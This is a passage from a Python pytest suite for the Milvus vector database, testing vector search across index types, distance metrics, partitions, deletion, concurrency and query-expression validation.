res = connect.search(collection, query)
@pytest.mark.skip("r0.3-test")
def _test_search_field(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception):
connect.search(collection, query)
def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function before and after deletion, all the search params is
correct, change top-k value.
check issue <a href="https://github.com/milvus-io/milvus/issues/4200">#4200</a>
method: search with the given vectors, check the result
expected: the deleted entities do not exist in the result.
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection, nb=10000)
first_int64_value = entities[0]["values"][0]
first_vector = entities[2]["values"][0]
search_param = get_search_param("FLAT")
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
vecs[:] = []
vecs.append(first_vector)
res = None
if top_k > max_top_k:
with pytest.raises(Exception):
connect.search(collection, query, fields=['int64'])
# pytest.skip("top_k value is larger than max_topp_k")
pass
else:
res = connect.search(collection, query, fields=['int64'])
assert len(res) == 1
assert len(res[0]) >= top_k
assert res[0][0].id == ids[0]
assert res[0][0].entity.get("int64") == first_int64_value
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.delete_entity_by_id(collection, ids[:1])
connect.flush([collection])
res2 = connect.search(collection, query, fields=['int64'])
assert len(res2) == 1
assert len(res2[0]) >= top_k
assert res2[0][0].id != ids[0]
if top_k > 1:
assert res2[0][0].id == res[0][1].id
assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
@pytest.mark.tags(CaseLabel.L2)
def test_search_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_after_index_different_metric_type(self, connect, collection, get_simple_index):
'''
target: test search with different metric_type
method: build index with L2, and search using IP
expected: search ok
'''
search_metric_type = "IP"
index_type = get_simple_index["index_type"]
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, metric_type=search_metric_type,
search_params=search_param)
connect.load_collection(collection)
if index_type == "FLAT":
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
assert res[0]._distances[0] > res[0]._distances[default_top_k - 1]
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.release_collection(collection)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(600)
def test_search_index_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_names=[default_tag])
else:
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_names=[default_tag])
assert len(res) == nq
assert len(res[0]) == top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_not_existed(self, connect, collection, get_top_k, get_nq, get_simple_index):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors and tag (tag name not existed in collection), check the result
expected: error raised
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_names=["new_tag"])
else:
connect.load_collection(collection)
with pytest.raises(Exception) as e:
connect.search(collection, query, partition_names=["new_tag"])
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_names=[new_tag])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions_B(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
tag = "tag"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
print(f'entities[-1]["values"][:1]: {entities[-1]["values"][:1]}')
print(f'new_entities[-1]["values"][:1]: {new_entities[-1]["values"][:1]}')
query, vecs = gen_query_vectors(field_name, new_entities, top_k, nq, search_params=search_param,
replace_vecs=[entities[-1]["values"][:1][0], new_entities[-1]["values"][:1][0]])
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query, partition_names=["(.*)tag"])
assert check_id_result(res[0], ids[0])
assert check_id_result(res[0], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_names=["new(.*)"])
assert not check_id_result(res[0], ids[0])
assert check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] < epsilon
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP")
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, query, partition_names=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_without_connect(self, dis_connect, collection):
'''
target: test search vectors without connection
method: use dis connected instance, call search method and check if search successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, default_query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_not_existed(self, connect):
'''
target: search collection not existed
method: search with the random collection_name, which is not in db
expected: status not ok
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_distance_l2(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Euclidean
expected: the return distance equals to the computed value
'''
nq = 2
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(default_nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="HAMMING")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with new random binary entities and SUBSTRUCTURE metric type
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUBSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: search with entities that related to inserted entities
expected: the return distance equals to the computed value
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUPERSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with SUPER
expected: the return distance equals to the computed value
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="TANIMOTO")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, connect, args):
'''
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
'''
num = 10
top_k = 10
nq = 20
collection_names = []
for i in range(num):
collection = gen_unique_str(uid + str(i))
connect.create_collection(collection, default_fields)
collection_names.append(collection)
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
for i in range(num):
connect.drop_collection(collection_names[i])
@pytest.mark.skip("r0.3-test")
def _test_query_entities_with_field_less_than_top_k(self, connect, id_collection):
"""
target: test search with field, and let return entities less than topk
method: insert entities and build ivf_ index, and search with field, n_probe=1
expected:
"""
entities, ids = init_data(connect, id_collection, auto_id=False)
simple_index = {"index_type": "IVF_FLAT", "params": {"nlist": 200}, "metric_type": "L2"}
connect.create_index(id_collection, field_name, simple_index)
# logging.getLogger().info(connect.get_collection_info(id_collection))
top_k = 300
default_query, default_query_vecs = gen_query_vectors(field_name, entities, top_k, nq,
search_params={"nprobe": 1})
expr = {"must": [gen_default_vector_expr(default_query)]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(id_collection)
res = connect.search(id_collection, query, fields=["int64"])
assert len(res) == nq
for r in res[0]:
assert getattr(r.entity, "int64") == getattr(r.entity, "id")
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_no_must(self, connect, collection):
'''
method: build query without must expr
expected: error raised
'''
# entities, ids = init_data(connect, collection)
query = update_query_expr(default_query, keep_old=False)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_no_vector_term_only(self, connect, collection):
'''
method: build query without vector only term
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_no_vector_range_only(self, connect, collection):
'''
method: build query without vector only range
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_range_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_vector_only(self, connect, collection):
entities, ids = init_data(connect, collection)
connect.load_collection(collection)
res = connect.search(collection, default_query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_wrong_format(self, connect, collection):
'''
method: build query without must expr, with wrong expr name
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must1": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_empty(self, connect, collection):
'''
method: search with empty query
expected: error raised
'''
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_value_not_in(self, connect, collection):
'''
method: build query with vector and term expr, with no term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[100000])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_value_all_in(self, connect, collection):
'''
method: build query with vector and term expr, with all term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[1])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_values_not_in(self, connect, collection):
'''
method: build query with vector and term expr, with no term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[i for i in range(100000, 100010)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_values_all_in(self, connect, collection):
'''
method: build query with vector and term expr, with all term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr()]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
limit = default_nb // 2
for i in range(nq):
for result in res[i]:
logging.getLogger().info(result.id)
assert result.id in ids[:limit]
# TODO:
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_values_parts_in(self, connect, collection):
'''
method: build query with vector and term expr, with parts of term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(
values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
# TODO:
@pytest.mark.tags(CaseLabel.L2)
def test_query_term_values_repeat(self, connect, collection):
'''
method: build query with vector and term expr, with the same values
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query),
